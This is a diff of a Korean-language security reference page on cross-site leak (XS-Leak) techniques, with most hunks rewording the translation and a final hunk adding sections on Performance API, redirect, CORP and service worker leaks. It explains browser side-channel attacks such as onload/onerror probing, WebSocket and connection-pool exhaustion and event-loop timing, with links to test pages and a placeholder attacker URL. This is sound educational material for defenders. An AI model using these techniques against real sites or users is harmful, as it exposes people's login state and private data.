@@ -56,7 +56,7 @@ XSinator는 여러 알려진 XS-Leaks에 대해 **브라우저를 검사하는 
 다음 기술 중 일부는 웹 페이지의 가능한 상태에서 차이를 감지하는 과정의 일환으로 타이밍을 사용할 것입니다. 웹 브라우저에서 시간을 측정하는 방법은 여러 가지가 있습니다.
 
 **시계**: [performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) API는 개발자가 고해상도 타이밍 측정을 얻을 수 있게 합니다.\
-공격자가 암묵적인 시계를 만들기 위해 남용할 수 있는 상당한 수의 API가 있습니다: [Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API), [Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel), [requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame), [setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout), CSS 애니메이션 등.\
+공격자가 암묵적인 시계를 만들기 위해 남용할 수 있는 API의 수가 상당히 많습니다: [Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API), [Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel), [requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame), [setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout), CSS 애니메이션 등.\
 자세한 정보는: [https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/)에서 확인할 수 있습니다.
 
 ## 이벤트 핸들러 기술
@@ -66,14 +66,14 @@ XSinator는 여러 알려진 XS-Leaks에 대해 **브라우저를 검사하는 
 - **포함 방법**: 프레임, HTML 요소
 - **감지 가능한 차이**: 상태 코드
 - **자세한 정보**: [https://www.usenix.org/conference/usenixsecurity19/presentation/staicu](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu), [https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
-- **요약**: 리소스를 로드하려고 할 때 onerror/onload 이벤트가 리소스가 성공적으로/실패적으로 로드되면 트리거되며, 상태 코드를 파악할 수 있습니다.
+- **요약**: 리소스를 로드하려고 할 때 onerror/onload 이벤트가 리소스가 성공적으로/실패적으로 로드되면 트리거되며 상태 코드를 파악할 수 있습니다.
 - **코드 예제**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](<https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)>)
 
 {{#ref}}
 xs-search/cookie-bomb-+-onerror-xs-leak.md
 {{#endref}}
 
-코드 예제는 **JS에서 스크립트 객체를 로드하려고 시도**하지만, **다른 태그**(예: 객체, 스타일시트, 이미지, 오디오)도 사용할 수 있습니다. 또한, **태그를 직접 주입**하고 태그 내부에 `onload` 및 `onerror` 이벤트를 선언하는 것도 가능합니다(대신 JS에서 주입하는 대신).
+코드 예제는 **JS**에서 스크립트 객체를 **로드하려고 시도하지만**, **다른 태그**(예: 객체, 스타일시트, 이미지, 오디오)도 사용할 수 있습니다. 또한, **태그를 직접 주입**하고 태그 내부에 `onload` 및 `onerror` 이벤트를 선언하는 것도 가능합니다(대신 JS에서 주입하는 대신).
 
 이 공격의 스크립트 없는 버전도 있습니다:
 ```html
@@ -121,7 +121,7 @@ xs-search/performance.now-+-force-heavy-task.md
 - **Summary:** [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API는 요청을 수행하는 데 걸리는 시간을 측정하는 데 사용할 수 있습니다. 다른 시계를 사용할 수 있습니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
 
-[Framing Protections](https://xsleaks.dev/docs/defenses/opt-in/xfo/)이 없는 경우, 페이지와 그 하위 리소스가 네트워크를 통해 로드되는 데 필요한 시간을 공격자가 측정할 수 있는 것으로 관찰되었습니다. 이 측정은 일반적으로 iframe의 `onload` 핸들러가 리소스 로딩 및 JavaScript 실행이 완료된 후에만 트리거되기 때문에 가능합니다. 스크립트 실행으로 인한 변동성을 우회하기 위해, 공격자는 `<iframe>` 내에서 [`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) 속성을 사용할 수 있습니다. 이 속성을 포함하면 JavaScript 실행과 같은 여러 기능이 제한되어 네트워크 성능에 주로 영향을 받는 측정을 용이하게 합니다.
+[Framing Protections](https://xsleaks.dev/docs/defenses/opt-in/xfo/)이 없는 경우, 페이지와 그 하위 리소스가 네트워크를 통해 로드되는 데 필요한 시간을 공격자가 측정할 수 있는 것으로 관찰되었습니다. 이 측정은 일반적으로 iframe의 `onload` 핸들러가 리소스 로드 및 JavaScript 실행이 완료된 후에만 트리거되기 때문에 가능합니다. 스크립트 실행으로 인한 변동성을 우회하기 위해 공격자는 `<iframe>` 내에서 [`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) 속성을 사용할 수 있습니다. 이 속성을 포함하면 JavaScript 실행과 같은 여러 기능이 제한되어 네트워크 성능에 주로 영향을 받는 측정을 용이하게 합니다.
 ```javascript
 // Example of an iframe with the sandbox attribute
 <iframe src="example.html" sandbox></iframe>
@@ -136,14 +136,14 @@ xs-search/performance.now-+-force-heavy-task.md
 
 비밀 콘텐츠가 포함된 페이지를 **Iframe** 안에 **삽입**할 수 있다고 가정해 보겠습니다.
 
-피해자가 "_**flag**_"가 포함된 파일을 **Iframe**을 사용하여 검색하도록 **유도**할 수 있습니다(예: CSRF를 악용). Iframe 안에서는 _**onload event**_가 **항상 최소한 한 번은 실행**될 것이라는 것을 알고 있습니다. 그런 다음, **URL**의 **iframe**을 **변경**할 수 있지만, URL의 **hash**의 **내용**만 변경합니다.
+피해자가 **Iframe**을 사용하여 "_**flag**_"가 포함된 파일을 **검색**하도록 만들 수 있습니다(예: CSRF를 악용). Iframe 내부에서 _**onload event**_는 **항상 최소한 한 번은 실행됩니다**. 그런 다음, **URL**의 **iframe**을 변경할 수 있지만 URL의 **hash**의 **내용**만 변경합니다.
 
 예를 들어:
 
 1. **URL1**: www.attacker.com/xssearch#try1
 2. **URL2**: www.attacker.com/xssearch#try2
 
-첫 번째 URL이 **성공적으로 로드**되었다면, **URL의 hash** 부분을 **변경**할 때 **onload** 이벤트는 **다시 트리거되지 않습니다**. 그러나 페이지가 **로드**할 때 어떤 종류의 **오류**가 발생했다면, **onload** 이벤트는 **다시 트리거됩니다**.
+첫 번째 URL이 **성공적으로 로드되었다면**, URL의 **hash** 부분을 **변경할 때** **onload** 이벤트는 **다시 트리거되지 않습니다**. 그러나 페이지가 **로드**할 때 어떤 종류의 **오류**가 발생했다면, **onload** 이벤트는 **다시 트리거됩니다**.
 
 그런 다음, **정상적으로** 로드된 페이지와 접근할 때 **오류**가 있는 페이지를 **구별**할 수 있습니다.
 
@@ -164,10 +164,10 @@ xs-search/javascript-execution-xs-leak.md
 - **Inclusion Methods**: HTML Elements
 - **Detectable Difference**: Status Code & Headers
 - **More info**: [https://xsleaks.dev/docs/attacks/browser-features/corb/](https://xsleaks.dev/docs/attacks/browser-features/corb/)
-- **Summary**: **Cross-Origin Read Blocking (CORB)**는 **Spectre**와 같은 공격으로부터 보호하기 위해 특정 민감한 교차 출처 리소스의 로드를 방지하는 보안 조치입니다. 그러나 공격자는 그 보호 동작을 악용할 수 있습니다. **CORB**의 적용을 받는 응답이 `nosniff`와 `2xx` 상태 코드가 있는 _**CORB 보호**_ `Content-Type`을 반환하면, **CORB**는 응답의 본문과 헤더를 제거합니다. 이를 관찰하는 공격자는 **상태 코드**(성공 또는 오류를 나타냄)와 `Content-Type`(CORB에 의해 보호되는지 여부를 나타냄)의 조합을 추론할 수 있어 정보 유출의 가능성이 있습니다.
+- **Summary**: **Cross-Origin Read Blocking (CORB)**는 웹 페이지가 특정 민감한 교차 출처 리소스를 로드하는 것을 방지하여 **Spectre**와 같은 공격으로부터 보호하는 보안 조치입니다. 그러나 공격자는 그 보호 동작을 악용할 수 있습니다. **CORB**의 적용을 받는 응답이 `nosniff`와 `2xx` 상태 코드가 있는 _**CORB 보호**_ `Content-Type`을 반환하면, **CORB**는 응답의 본문과 헤더를 제거합니다. 이를 관찰하는 공격자는 **상태 코드**(성공 또는 오류를 나타냄)와 `Content-Type`(CORB에 의해 보호되는지 여부를 나타냄)의 조합을 추론할 수 있어 잠재적인 정보 유출로 이어질 수 있습니다.
 - **Code Example**:
 
-더 많은 정보는 공격에 대한 링크를 확인하세요.
+더 많은 정보에 대한 링크를 확인하여 공격에 대한 추가 정보를 확인하십시오.
 
 ### onblur
 
@@ -177,7 +177,7 @@ xs-search/javascript-execution-xs-leak.md
 - **Summary**: id 또는 name 속성에서 민감한 데이터를 유출합니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)
 
-페이지를 **iframe** 안에 **로드**하고 **`#id_value`**를 사용하여 iframe의 요소에 **포커스**를 맞출 수 있습니다. 그런 다음 **`onblur`** 신호가 트리거되면 ID 요소가 존재합니다.\
+페이지를 **iframe** 안에 **로드**하고 **`#id_value`**를 사용하여 페이지가 지정된 요소에 **포커스**를 맞추도록 할 수 있습니다. 그런 다음 **`onblur`** 신호가 트리거되면 ID 요소가 존재합니다.\
 **`portal`** 태그로 동일한 공격을 수행할 수 있습니다.
 
 ### postMessage Broadcasts <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>
@@ -188,7 +188,7 @@ xs-search/javascript-execution-xs-leak.md
 - **Summary**: postMessage에서 민감한 정보를 수집하거나 postMessages의 존재를 오라클로 사용하여 페이지에서 사용자의 상태를 알 수 있습니다.
 - **Code Example**: `모든 postMessages를 수신하는 코드.`
 
-응용 프로그램은 서로 다른 출처 간에 통신하기 위해 [`postMessage` broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage)를 자주 사용합니다. 그러나 `targetOrigin` 매개변수가 제대로 지정되지 않으면 이 방법은 **민감한 정보**를 우연히 노출할 수 있습니다. 또한 메시지를 수신하는 행위 자체가 **오라클** 역할을 할 수 있습니다. 예를 들어, 특정 메시지는 로그인한 사용자에게만 전송될 수 있습니다. 따라서 이러한 메시지의 존재 여부는 사용자의 상태나 신원에 대한 정보를 드러낼 수 있습니다.
+응용 프로그램은 서로 다른 출처 간에 통신하기 위해 [`postMessage` broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage)를 자주 사용합니다. 그러나 이 방법은 `targetOrigin` 매개변수가 제대로 지정되지 않으면 **민감한 정보**를 우연히 노출할 수 있습니다. 또한 메시지를 수신하는 행위 자체가 **오라클** 역할을 할 수 있습니다. 예를 들어, 특정 메시지는 로그인한 사용자에게만 전송될 수 있습니다. 따라서 이러한 메시지의 존재 여부는 사용자의 상태나 신원에 대한 정보를 드러낼 수 있습니다.
 
 ## Global Limits Techniques
 
@@ -200,9 +200,9 @@ xs-search/javascript-execution-xs-leak.md
 - **Summary**: WebSocket 연결 한계를 소진하여 교차 출처 페이지의 WebSocket 연결 수를 유출합니다.
 - **Code Example**: [https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)>), [https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)>)
 
-대상 페이지가 사용하는 **WebSocket 연결**의 수를 식별할 수 있습니다. 이를 통해 공격자는 애플리케이션 상태를 감지하고 WebSocket 연결 수와 관련된 정보를 유출할 수 있습니다.
+대상 페이지가 사용하는 **WebSocket 연결**의 수를 식별할 수 있습니다. 이는 공격자가 애플리케이션 상태를 감지하고 WebSocket 연결 수와 관련된 정보를 유출할 수 있게 합니다.
 
-하나의 **출처**가 **최대 WebSocket** 연결 객체 수를 사용하고 있다면, 연결 상태와 관계없이 **새 객체를 생성하면 JavaScript 예외가 발생합니다**. 이 공격을 실행하기 위해 공격자 웹사이트는 대상 웹사이트를 팝업 또는 iframe에서 열고, 대상 웹이 로드된 후 가능한 최대 수의 WebSocket 연결을 생성하려고 시도합니다. **던져진 예외의 수**는 **대상 웹사이트** 창에서 사용된 **WebSocket 연결의 수**입니다.
+하나의 **origin**이 **최대 WebSocket** 연결 객체 수를 사용하고 있다면, 연결 상태와 관계없이 **새 객체를 생성하면 JavaScript 예외가 발생합니다**. 이 공격을 실행하기 위해 공격자 웹사이트는 대상 웹사이트를 팝업 또는 iframe에서 열고, 대상 웹이 로드된 후 가능한 최대 수의 WebSocket 연결을 생성하려고 시도합니다. **던져진 예외의 수**는 **대상 웹사이트** 창에서 사용된 **WebSocket 연결의 수**입니다.
 
 ### Payment API
 
@@ -214,7 +214,7 @@ xs-search/javascript-execution-xs-leak.md
 
 이 XS-Leak는 공격자가 **교차 출처 페이지가 결제 요청을 시작할 때** 감지할 수 있게 합니다.
 
-**결제 요청**은 한 번에 하나만 활성화될 수 있기 때문에, 대상 웹사이트가 Payment Request API를 사용하고 있다면, 이 API를 사용하려는 추가 시도는 실패하게 되고 **JavaScript 예외**를 발생시킵니다. 공격자는 **주기적으로 Payment API UI를 표시하려고 시도**하여 이를 악용할 수 있습니다. 한 번의 시도가 예외를 발생시키면, 대상 웹사이트가 현재 이를 사용하고 있다는 것을 알 수 있습니다. 공격자는 생성 후 즉시 UI를 닫아 이러한 주기적인 시도를 숨길 수 있습니다.
+**결제 요청**은 한 번에 하나만 활성화될 수 있기 때문에, 대상 웹사이트가 Payment Request API를 사용하고 있다면, 이 API를 사용하려는 추가 시도는 실패하게 되고 **JavaScript 예외**를 발생시킵니다. 공격자는 **주기적으로 Payment API UI를 표시하려고 시도**하여 이를 악용할 수 있습니다. 하나의 시도가 예외를 발생시키면, 대상 웹사이트가 현재 이를 사용하고 있다는 것을 알 수 있습니다. 공격자는 생성 후 즉시 UI를 닫아 이러한 주기적인 시도를 숨길 수 있습니다.
 
 ### Timing the Event Loop <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>
 
@@ -228,7 +228,7 @@ xs-search/javascript-execution-xs-leak.md
 xs-search/event-loop-blocking-+-lazy-images.md
 {{#endref}}
 
-JavaScript는 [단일 스레드 이벤트 루프](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) 동시성 모델에서 작동하며, 이는 **한 번에 하나의 작업만 실행할 수 있음을 의미합니다**. 이 특성은 **다른 출처의 코드 실행 시간을 측정하는 데 악용될 수 있습니다**. 공격자는 고정 속성을 가진 이벤트를 지속적으로 전송하여 이벤트 루프에서 자신의 코드 실행 시간을 측정할 수 있습니다. 이러한 이벤트는 이벤트 풀에 여유가 있을 때 처리됩니다. 다른 출처도 동일한 풀에 이벤트를 전송하는 경우, **공격자는 자신의 작업 실행 지연을 관찰하여 이러한 외부 이벤트의 실행 시간을 추론할 수 있습니다**. 지연을 모니터링하는 이 방법은 다른 출처의 코드 실행 시간을 드러내어 민감한 정보를 노출할 수 있습니다.
+JavaScript는 [단일 스레드 이벤트 루프](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) 동시성 모델에서 작동하며, 이는 **한 번에 하나의 작업만 실행할 수 있음을 의미합니다**. 이 특성은 **다른 출처의 코드 실행 시간을 측정하는 데 악용될 수 있습니다**. 공격자는 고정 속성을 가진 이벤트를 지속적으로 전송하여 이벤트 루프에서 자신의 코드 실행 시간을 측정할 수 있습니다. 이러한 이벤트는 이벤트 풀에 비어 있을 때 처리됩니다. 다른 출처도 동일한 풀에 이벤트를 전송하는 경우, **공격자는 자신의 작업 실행 지연을 관찰하여 이러한 외부 이벤트의 실행 시간을 추론할 수 있습니다**. 지연을 모니터링하는 이 방법은 다른 출처의 코드 실행 시간을 드러낼 수 있으며, 잠재적으로 민감한 정보를 노출할 수 있습니다.
 
 > [!WARNING]
 > 실행 시간 측정에서는 **네트워크 요인**을 **제거**하여 **더 정확한 측정값**을 얻을 수 있습니다. 예를 들어, 페이지를 로드하기 전에 페이지에서 사용하는 리소스를 로드함으로써 가능합니다.
@@ -238,10 +238,10 @@ JavaScript는 [단일 스레드 이벤트 루프](https://developer.mozilla.org/
 - **Inclusion Methods**:
 - **Detectable Difference**: Timing (generally due to Page Content, Status Code)
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop)
-- **Summary:** 웹 작업의 실행 시간을 측정하는 한 가지 방법은 스레드의 이벤트 루프를 의도적으로 차단한 다음 **이벤트 루프가 다시 사용 가능해지는 데 걸리는 시간**을 측정하는 것입니다. 차단 작업(예: 긴 계산 또는 동기 API 호출)을 이벤트 루프에 삽입하고, 후속 코드가 실행되기 시작하는 데 걸리는 시간을 모니터링함으로써 차단 기간 동안 이벤트 루프에서 실행 중이던 작업의 지속 시간을 추론할 수 있습니다. 이 기술은 JavaScript의 이벤트 루프가 단일 스레드로 작동하여 작업이 순차적으로 실행되는 특성을 활용하며, 동일한 스레드를 공유하는 다른 작업의 성능이나 동작에 대한 통찰력을 제공할 수 있습니다.
+- **Summary:** 웹 작업의 실행 시간을 측정하는 한 가지 방법은 스레드의 이벤트 루프를 의도적으로 차단한 다음 **이벤트 루프가 다시 사용 가능해지는 데 걸리는 시간**을 측정하는 것입니다. 차단 작업(예: 긴 계산 또는 동기 API 호출)을 이벤트 루프에 삽입하고, 후속 코드가 실행되기 시작하는 데 걸리는 시간을 모니터링함으로써 차단 기간 동안 이벤트 루프에서 실행 중인 작업의 지속 시간을 추론할 수 있습니다. 이 기술은 JavaScript의 이벤트 루프가 단일 스레드로 작동하여 작업이 순차적으로 실행되는 특성을 활용하며, 동일한 스레드를 공유하는 다른 작업의 성능이나 동작에 대한 통찰력을 제공할 수 있습니다.
 - **Code Example**:
 
-이벤트 루프를 잠금으로써 실행 시간을 측정하는 기술의 중요한 장점은 **사이트 격리**를 우회할 수 있는 잠재력입니다. **사이트 격리**는 서로 다른 웹사이트를 별도의 프로세스로 분리하여 악의적인 사이트가 다른 사이트의 민감한 데이터에 직접 접근하는 것을 방지하는 보안 기능입니다. 그러나 공유 이벤트 루프를 통해 다른 출처의 실행 시간을 영향을 미침으로써 공격자는 해당 출처의 활동에 대한 정보를 간접적으로 추출할 수 있습니다. 이 방법은 다른 출처의 데이터에 대한 직접적인 접근에 의존하지 않고, 오히려 해당 출처의 활동이 공유 이벤트 루프에 미치는 영향을 관찰하여 **사이트 격리**에 의해 설정된 보호 장벽을 피할 수 있습니다.
+이벤트 루프를 잠금으로써 실행 시간을 측정하는 기술의 중요한 장점은 **사이트 격리**를 우회할 수 있는 잠재력입니다. **사이트 격리**는 서로 다른 웹사이트를 별도의 프로세스로 분리하여 악의적인 사이트가 다른 사이트의 민감한 데이터에 직접 접근하는 것을 방지하는 보안 기능입니다. 그러나 공유 이벤트 루프를 통해 다른 출처의 실행 시간을 영향을 미침으로써 공격자는 해당 출처의 활동에 대한 정보를 간접적으로 추출할 수 있습니다. 이 방법은 다른 출처의 데이터에 대한 직접적인 접근에 의존하지 않고, 오히려 해당 출처의 활동이 공유 이벤트 루프에 미치는 영향을 관찰하여 **사이트 격리**에 의해 설정된 보호 장벽을 회피합니다.
 
 > [!WARNING]
 > 실행 시간 측정에서는 **네트워크 요인**을 **제거**하여 **더 정확한 측정값**을 얻을 수 있습니다. 예를 들어, 페이지를 로드하기 전에 페이지에서 사용하는 리소스를 로드함으로써 가능합니다.
@@ -258,10 +258,10 @@ JavaScript는 [단일 스레드 이벤트 루프](https://developer.mozilla.org/
 xs-search/connection-pool-example.md
 {{#endref}}
 
-브라우저는 서버 통신을 위해 소켓을 사용하지만, 운영 체제와 하드웨어의 제한된 자원으로 인해 **브라우저는 동시 소켓 수에 제한을 두어야 합니다**. 공격자는 다음 단계를 통해 이 제한을 악용할 수 있습니다:
+브라우저는 서버 통신을 위해 소켓을 사용하지만, 운영 체제와 하드웨어의 제한된 리소스 때문에 **브라우저는 동시 소켓 수에 제한을 두어야 합니다**. 공격자는 다음 단계를 통해 이 제한을 악용할 수 있습니다:
 
 1. 브라우저의 소켓 한도를 확인합니다. 예를 들어, 256개의 전역 소켓.
-2. 255개의 소켓을 오랜 시간 동안 점유하여 다양한 호스트에 255개의 요청을 시작하여 연결을 열어 두고 완료하지 않습니다.
+2. 255개의 소켓을 오랜 시간 동안 점유하기 위해 다양한 호스트에 255개의 요청을 시작하여 연결을 열어 두고 완료하지 않습니다.
 3. 256번째 소켓을 사용하여 대상 페이지에 요청을 보냅니다.
 4. 다른 호스트에 257번째 요청을 시도합니다. 모든 소켓이 사용 중이므로(2단계와 3단계에 따라) 이 요청은 소켓이 사용 가능해질 때까지 대기열에 놓입니다. 이 요청이 진행되기까지의 지연 시간은 공격자에게 256번째 소켓(대상 페이지의 소켓)과 관련된 네트워크 활동에 대한 시간 정보를 제공합니다. 이 추론은 2단계에서 255개의 소켓이 여전히 사용 중이므로, 새로 사용 가능한 소켓은 3단계에서 해제된 소켓이어야 함을 의미합니다. 따라서 256번째 소켓이 사용 가능해지는 데 걸리는 시간은 대상 페이지에 대한 요청이 완료되는 데 걸린 시간과 직접적으로 연결됩니다.
 
@@ -272,15 +272,15 @@ xs-search/connection-pool-example.md
 - **Inclusion Methods**: JavaScript Requests
 - **Detectable Difference**: Timing (generally due to Page Content, Status Code)
 - **More info**:
-- **Summary:** 이전 기술과 유사하지만 모든 소켓을 사용하는 대신 Google **Chrome**은 **동일한 출처에 대해 6개의 동시 요청**에 제한을 둡니다. **5개를 차단**한 다음 **6번째** 요청을 시작하면 **시간을 측정**할 수 있으며, **피해자 페이지가** 동일한 엔드포인트에 더 많은 **요청을 보내도록** 유도하면 **6번째 요청**이 **더 오래 걸리게** 되어 이를 감지할 수 있습니다.
+- **Summary:** 이전 기술과 유사하지만 모든 소켓을 사용하는 대신 Google **Chrome**은 **동일한 출처에 대해 6개의 동시 요청**에 제한을 둡니다. **5개를 차단**한 다음 **6번째** 요청을 시작하면 **시간을 측정**할 수 있으며, **피해자 페이지가** 동일한 엔드포인트에 **더 많은 요청을 보내도록** 만들 수 있다면, **6번째 요청**은 **더 오래 걸리며** 이를 감지할 수 있습니다.
 
 ## Performance API Techniques
 
 [`Performance API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance)는 웹 애플리케이션의 성능 메트릭에 대한 통찰력을 제공하며, [`Resource Timing API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API)로 더욱 풍부해집니다. Resource Timing API는 요청의 지속 시간과 같은 상세한 네트워크 요청 타이밍을 모니터링할 수 있게 해줍니다. 특히 서버가 응답에 `Timing-Allow-Origin: *` 헤더를 포함하면 전송 크기 및 도메인 조회 시간과 같은 추가 데이터가 제공됩니다.
 
-이 풍부한 데이터는 [`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) 또는 [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName)와 같은 메서드를 통해 검색할 수 있으며, 성능 관련 정보에 대한 포괄적인 뷰를 제공합니다. 또한 API는 [`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now)에서 얻은 타임스탬프 간의 차이를 계산하여 실행 시간을 측정할 수 있게 해줍니다. 그러나 Chrome과 같은 브라우저의 특정 작업에 대해 `performance.now()`의 정밀도가 밀리초로 제한될 수 있어 타이밍 측정의 세분성에 영향을 미칠 수 있습니다.
+이 풍부한 데이터는 [`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) 또는 [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName)와 같은 메서드를 통해 검색할 수 있으며, 성능 관련 정보에 대한 포괄적인 뷰를 제공합니다. 또한 API는 [`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now)에서 얻은 타임스탬프의 차이를 계산하여 실행 시간을 측정할 수 있게 해줍니다. 그러나 Chrome과 같은 브라우저의 특정 작업에 대해 `performance.now()`의 정밀도가 밀리초로 제한될 수 있어 타이밍 측정의 세분성에 영향을 미칠 수 있습니다.
 
-타이밍 측정 외에도 Performance API는 보안 관련 통찰력을 제공하는 데 활용될 수 있습니다. 예를 들어, Chrome의 `performance` 객체에 페이지가 존재하는지 여부는 `X-Frame-Options`의 적용을 나타낼 수 있습니다. 특히, `X-Frame-Options`로 인해 프레임에서 렌더링이 차단된 페이지는 `performance` 객체에 기록되지 않으므로 페이지의 프레이밍 정책에 대한 미세한 단서를 제공합니다.
+타이밍 측정 외에도 Performance API는 보안 관련 통찰력을 위해 활용될 수 있습니다. 예를 들어, Chrome의 `performance` 객체에 페이지가 존재하는지 여부는 `X-Frame-Options`의 적용을 나타낼 수 있습니다. 구체적으로, `X-Frame-Options`로 인해 프레임에서 렌더링이 차단된 페이지는 `performance` 객체에 기록되지 않으며, 이는 페이지의 프레이밍 정책에 대한 미세한 단서를 제공합니다.
 
 ### Error Leak
 
@@ -338,7 +338,91 @@ HTTP 응답 상태 코드를 **구별**할 수 있습니다. 오류로 이어지
 - **Detectable Difference**: Header
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2), [https://xsleaks.github.io/xsleaks/examples/x-frame/index.html](https://xsleaks.github.io/xsleaks/examples/x-frame/index.html), [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options)
 - **Summary:** X-Frame-Options 헤더가 있는 리소스는 리소스 타이밍 항목을 생성하지 않습니다.
-- **
+- **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak](https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak)
+
+페이지가 **iframe**에서 **렌더링**되는 것이 **허용되지 않는 경우** 성능 항목을 생성하지 않습니다. 결과적으로 공격자는 응답 헤더 **`X-Frame-Options`**를 감지할 수 있습니다.\
+**embed** **태그**를 사용할 때도 마찬가지입니다.
+
+### Download Detection
+
+- **Inclusion Methods**: Frames
+- **Detectable Difference**: Header
+- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **Summary:** 다운로드는 Performance API에서 리소스 타이밍 항목을 생성하지 않습니다.
+- **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Download%20Detection](https://xsinator.com/testing.html#Performance%20API%20Download%20Detection)
+
+설명된 XS-Leak와 유사하게, **ContentDisposition** 헤더로 인해 **다운로드되는 리소스**도 **성능 항목을 생성하지 않습니다**. 이 기술은 모든 주요 브라우저에서 작동합니다.
+
+### Redirect Start Leak
+
+- **Inclusion Methods**: Frames
+- **Detectable Difference**: Redirect
+- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **Summary:** 리소스 타이밍 항목은 리디렉션의 시작 시간을 유출합니다.
+- **Code Example**: [https://xsinator.com/testing.html#Redirect%20Start%20Leak](https://xsinator.com/testing.html#Redirect%20Start%20Leak)
+
+일부 브라우저가 교차 출처 요청에 대해 너무 많은 정보를 기록하는 동작을 악용하는 XS-Leak 인스턴스를 발견했습니다. 표준은 교차 출처 리소스에 대해 설정해야 하는 속성의 하위 집합을 정의합니다. 그러나 **SA**에서는 사용자가 대상 페이지에 의해 **리디렉션**되었는지 감지할 수 있습니다. Performance API를 쿼리하고 **redirectStart timing data**를 확인하여 가능합니다.
+
+### Duration Redirect Leak
+
+- **Inclusion Methods**: Fetch API
+- **Detectable Difference**: Redirect
+- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **Summary:** 리디렉션이 발생할 때 타이밍 항목의 지속 시간이 음수입니다.
+- **Code Example**: [https://xsinator.com/testing.html#Duration%20Redirect%20Leak](https://xsinator.com/testing.html#Duration%20Redirect%20Leak)
+
+GC에서 **리디렉션**이 발생하는 요청의 **지속 시간**은 **음수**이며, 따라서 **리디렉션이 발생하지 않는 요청**과 **구별**할 수 있습니다.
+
+### CORP Leak
+
+- **Inclusion Methods**: Frames
+- **Detectable Difference**: Header
+- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **Summary:** CORP로 보호된 리소스는 리소스 타이밍 항목을 생성하지 않습니다.
+- **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak](https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak)
+
+일부 경우, **nextHopProtocol entry**를 유출 기술로 사용할 수 있습니다. GC에서 **CORP header**가 설정되면 nextHopProtocol은 **비어 있습니다**. SA는 CORP가 활성화된 리소스에 대해 성능 항목을 전혀 생성하지 않습니다.
+
+### Service Worker
+
+- **Inclusion Methods**: Frames
+- **Detectable Difference**: API Usage
+- **More info**: [https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/](https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/)
+- **Summary:** 특정 출처에 대해 서비스 워커가 등록되어 있는지 감지합니다.
+- **Code Example**:
+
+서비스 워커는 출처에서 실행되는 이벤트 기반 스크립트 컨텍스트입니다. 이들은 웹 페이지의 백그라운드에서 실행되며, 리소스를 가로채고 수정하며 **오프라인 웹 애플리케이션**을 만들기 위해 리소스를 캐시할 수 있습니다.\
+**서비스 워커**에 의해 **캐시된 리소스**가 **iframe**을 통해 접근되면, 리소스는 **서비스 워커 캐시**에서 **로드됩니다**.\
